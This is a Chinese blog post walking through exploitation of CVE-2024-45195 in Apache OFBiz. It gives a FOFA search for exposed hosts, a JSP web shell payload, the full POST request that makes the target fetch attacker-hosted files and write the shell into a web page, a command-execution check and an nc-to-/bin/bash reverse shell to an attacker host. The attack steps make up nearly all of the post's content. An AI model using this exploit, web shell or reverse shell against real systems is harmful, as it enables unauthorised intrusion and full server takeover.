Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)并拿到shell

最新推荐文章于 2024-11-15 10:39:27 发布
最新推荐文章于 2024-11-15 10:39:27 发布
阅读量938 收藏 11
点赞数 22
文章标签: apache 笔记 学习 经验分享 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67840381/article/details/142168514
版权

FOFA:app="Apache_OFBiz"

复现:

VPS上准备两个文件

rceschema.xml

<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
            <record name="rceentry" limit="many">
                <field name="jsp" type="String" length="605" position="0"></field>
            </record>
        </data-file>
</data-files>

rcereport.csv

<%@ page import='java.io.*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>

POC:

POST /webtools/control/forgotPassword/viewdatafile HTTP/2
Host: 目标地址
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Type: application/x-www-form-urlencoded


DATAFILE_LOCATION=http://公网ip:端口/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://公网ip:端口/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce

原来的包

服务器python开启http服务

python3 -m http.server 8888

ps:在服务器中要加这个规则,把防火墙关了

看看能不能访问

发送修改后的包

服务器上启的http服务收到访问链接

 访问下列接口进行RCE验证

GET /accounting/index.jsp?cmd=id HTTP/2
Host: 对方的host

反弹shell

查询有无nc

这次使用的nc命令为

        nc ip 端口 | /bin/bash|nc ip 端口

        如nc 124.70.xxx.xxx 4443|/bin/bash|nc 124.70.xxx.xxx 4441

开启监听

让对方执行nc命令(要对命令进行url编码)

下面是编码后的换成自己的就好啦ps:右边没回显说明成功

nc+ip+端口%7C%2Fbin%2Fbash%7Cnc+ip+端口

可能遇到的问题:

监听不到可能是因为在入站规则没加那两个端口加一下就好了

还有关防火墙

白云间丶
关注
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
严重 Zimbra RCE 漏洞遭大规模利用(CVE-2024-45519
网络研究观
10-02 863
攻击者正在积极利用 CVE-2024-45519,这是一个严重的 Zimbra 漏洞,该漏洞允许他们在易受攻击的安装上执行任意命令。
CVE-2024-45195漏洞复现并反弹shellApache OFBiz 未授权远程代码执行漏洞
yyytaotao的博客
09-12 560
本文利用了一个云服务器来远程代码执行并反弹shell.
漏洞复现Apache OFBiz 授权不当致远程代码执行
今天是几号的博客
08-06 838
攻击者可能利用该漏洞执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。Apache OFBiz 是一个开源的企业资源计划 (ERP) 和客户关系管理 (CRM) 软件平台,提供全面的企业管理解决方案,包括电子商务、库存管理、制造、会计等功能,支持企业进行灵活的定制和扩展。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
CVE-2020-9496 ofbiz反序列化漏洞分析1
08-03
CVE-2020-9496 ofbiz反序列化漏洞分析 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、...
CVE-2021-26295-Apache-OFBiz:CVE-2021-26295 Apache OFBiz rmi反序列化POC
03-25
CVE-2021-26295-Apache-OFBiz CVE-2021-26295 Apache OFBiz rmi反序列化POC需要将ysoserial.jar放置在目录下,并且不能使用java的高版本
ofbizApache OFBiz-主要开发已移至ofbiz-frameworks存储库
02-03
ApacheOFBiz:registered: 欢迎使用ApacheOFBiz:registered: ! 一个功能强大的顶级Apache软件项目。 OFBiz是用Java编写的企业资源计划(ERP)系统,并包含大量库,实体,服务和功能,以运行您的业务的各个方面。 ...
apache-ofbiz-16.11.02源码+ofbiz菜鸟笔记+Apache+OFBiz+开发初学者指南
09-14
apache-ofbiz-16.11.02.zip,ofbiz菜鸟笔记Apache+OFBiz+开发初学者指南.chm
kali上安装docker,并且生成centos7容器和创建apache容器后台运行
2202_75361164的博客
11-15 727
首先更新一下软件包列表下载docker验证是否安装成功docker -v。
打造专业问答社区:Windows部署Apache Answer结合cpolar实现公网访问
qq_73017178的博客
11-14 1304
本篇文章介绍如何在本地部署问答软件Apache Answer,并结合Cpolar内网穿透发布至公网。
什是服务器器和Apache Tomcat介绍(笔记
weixin_67996964的博客
11-15 462
⼀一个开源软件项⽬目的Apache 的团体提供⽀支持的⾮非盈利利性组织,也是我们java开发里⾯面顶级的组织,阿⾥里里也向apache组织贡献了了多个开源项⽬目。简单来说:是⼀一个开放源代码的轻量量级 Web应⽤用服务器器,⽬目前javaweb开发⾥里里⾯面⽤用的最多⼀个web服务器器之⼀一。Apache是web服务器器,Tomcat是应⽤用(java)服务器器,它是⼀一个servlet容器器,是。简介:讲解什什么是服务器器和Tomcat介绍。
三、模板与配置(下)
B6665X的博客
11-14 1304
三、模板与配置8、WXSS模板样式-全局样式和局部样式9、全局配置-全局配置文件及常用的配置项10、全局配置-小程序窗口的组成部分11、全局配置-window12、全局配置-tabBar13、全局配置-案例:配置tabBar14、页面配置
Apache Paimon、Apache Hudi、Apache Iceberg对比分析
JustinMars的博客
11-14 265
开源数据湖产品对比
本地部署Apache Answer搭建高效的知识型社区并一键发布到公网流程
weixin_42878111的博客
11-15 1243
本文将介绍如何在本地环境中部署开源问答软件Apache Answer,并通过Cpolar内网穿透技术将其发布到公网。Apache Answer 是一个高度可扩展的知识型社区平台,类似于国内外知名的知乎等网站。它提供了一个免费且高效的解决方案,帮助任何组织和个人快速搭建自己的问答社区,适用于产品技术支持、客户交流和用户互动等多种场景。借助 Apache Answer,您可以促进组织与用户之间以及用户之间的友好交流、学习和共同成长。
部署Apache Doris
最新发布
qianghong000的博客
11-15 1067
Doris
Apache Doris 技术系列文章:高级特性与性能优化
Programming Talk
11-13 316
本文将继续深入探讨 Doris 的高级特性,包括数据模型选择、索引优化、分布式事务处理等内容。同时,我们将分享一些性能调优的技巧,并讨论常见的问题及其解决方案。本文深入探讨了 Apache Doris 的高级特性,包括数据模型选择、索引优化、分布式事务处理等内容,并分享了一些性能调优的技巧和常见问题的解决方案。希望这些内容能够帮助读者更好地理解和使用 Doris,进一步提升系统的性能和稳定性。Doris 支持多种数据模型,每种模型适用于不同的场景。对于经常进行聚合查询的场景,可以预先计算并存储聚合结果。
Apache Doris:快速入门与实践
Programming Talk
11-13 627
Apache Doris 是一款开源的、基于 MPP(Massively Parallel Processing)架构的实时数据分析引擎。它结合了 MySQL 的易用性和 Hadoop 的强大计算能力,能够在毫秒级响应时间下执行复杂的 SQL 查询。Doris 支持多种数据导入方式,包括但不限于批量加载、流式插入以及通过 Broker 进行外部数据源的导入。
XP系统下用mod_jk 1.2.40整合apache2.2.16和tomcat 6.0.29,让apache可以同时访问php和jsp页面
ZLK1214的专栏
11-14 674
需要修改C:\Program Files\Apache Software Foundation\Apache2.2\conf\extra\httpd-ssl.conf配置文件,在里面也要加入JkMount /*.jsp worker1。C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ROOT\haha里面有index.jsp页面。页面放好后,可在tomcat中访问,apache目前还无法访问。
CVE-2020-9496
08-31
CVE-2020-9496是Apache Ofbiz组件中的一个漏洞。根据引用和引用的内容,该漏洞被评级为高危,漏洞评分为8.0。这个漏洞的具体细节和复现可以参考引用中的文章。根据引用的内容,该漏洞是通过利用Apache Ofbiz中的XMLRPC RCE漏洞来实现的。具体的复现过程可以参考引用中提供的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CVE-2020-9496 Apache OFBiz XML-RPC反序列化漏洞复现](https://blog.csdn.net/Shadow_DAI_990101/article/details/126490894)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [CVE-2020-9496:Apache Ofbiz 反序列化漏洞分析](https://blog.csdn.net/weixin_45728976/article/details/108872281)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值